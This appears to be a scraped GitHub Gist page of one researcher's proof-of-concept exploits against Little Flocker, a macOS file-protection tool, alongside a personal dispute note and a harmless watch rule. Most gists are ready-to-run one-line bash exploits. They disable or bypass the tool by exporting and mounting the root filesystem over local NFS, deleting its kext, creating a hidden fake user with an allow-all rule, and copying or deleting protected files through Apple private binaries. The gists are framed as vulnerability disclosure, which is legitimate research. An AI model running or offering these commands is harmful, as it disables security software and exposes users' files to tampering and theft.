Skip to content

Instantly share code, notes, and snippets.

😎
Focusing

Sabri pwnsdx

😎
Focusing
Block or report user

Report or block pwnsdx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pwnsdx
pwnsdx / ff.sh
Last active Aug 17, 2016
Multiple bugs in Little Flocker (previously named FlockFlock) (<=0.0.41)
View ff.sh
# Description: FlockFlock's Daemon does not protect flockflock_temp.png from tampering
# Impact: An attacker can use this entry point to do various things like disabling FlockFlock,
# preventing the app icon from showing and even creating or deleting files by replacing
# them with a fancy icon!
# Severity: Very High
# Info: && echo "" > /Users/sabri/.t; is just here to trigger a popup and is not required
# (except for "Disable FlockFlock by deleting default config and user config .flockflockrc
# file").
@pwnsdx
pwnsdx / ff.sh
Last active Aug 18, 2016
Pwn Little Flocker in 1 Bash line? Challenge accepted! (previously named FlockFlock) (<=0.0.36)
View ff.sh
# View/Edit .flockflockrc
cd $HOME && __FILE=".flockflockrc"; ln -v "$__FILE" "/tmp/$__FILE"
# View/Edit the first file in the Desktop folder
cd $HOME/Desktop/ && __FILE=$(ls -p | grep -v / | sort -n | head -1); ln -v "$__FILE" "/tmp/$__FILE"
@pwnsdx
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
@pwnsdx
pwnsdx / ff.sh
Last active Jan 7, 2017
Critical vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.45)
View ff.sh
# Access, modify or delete any files on the hard drive (except SIP'ed files of course)
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned
# Or just delete Little Flocker kext?
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned && rm -rf /tmp/.pwned/Library/Extensions/LittleFlocker.kext/Contents/MacOS/LittleFlocker
@pwnsdx
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
View response.txt
Hello,
Here is the last discussion I had with him (he dared mentioned me on a 10 days old topic and then when I give arguments to the very same topic or replies to his attacks I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebin: https://i.imgur.com/TRqgn5g.png
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
View ff.sh
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
View ff.sh
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
@pwnsdx
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
@pwnsdx
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
View ff.sh
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
@pwnsdx
pwnsdx / Google Chrome Extension Watcher.flock
Last active Dec 22, 2018
Google Chrome Extension Watcher.flock
View Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r
You can’t perform that action at this time.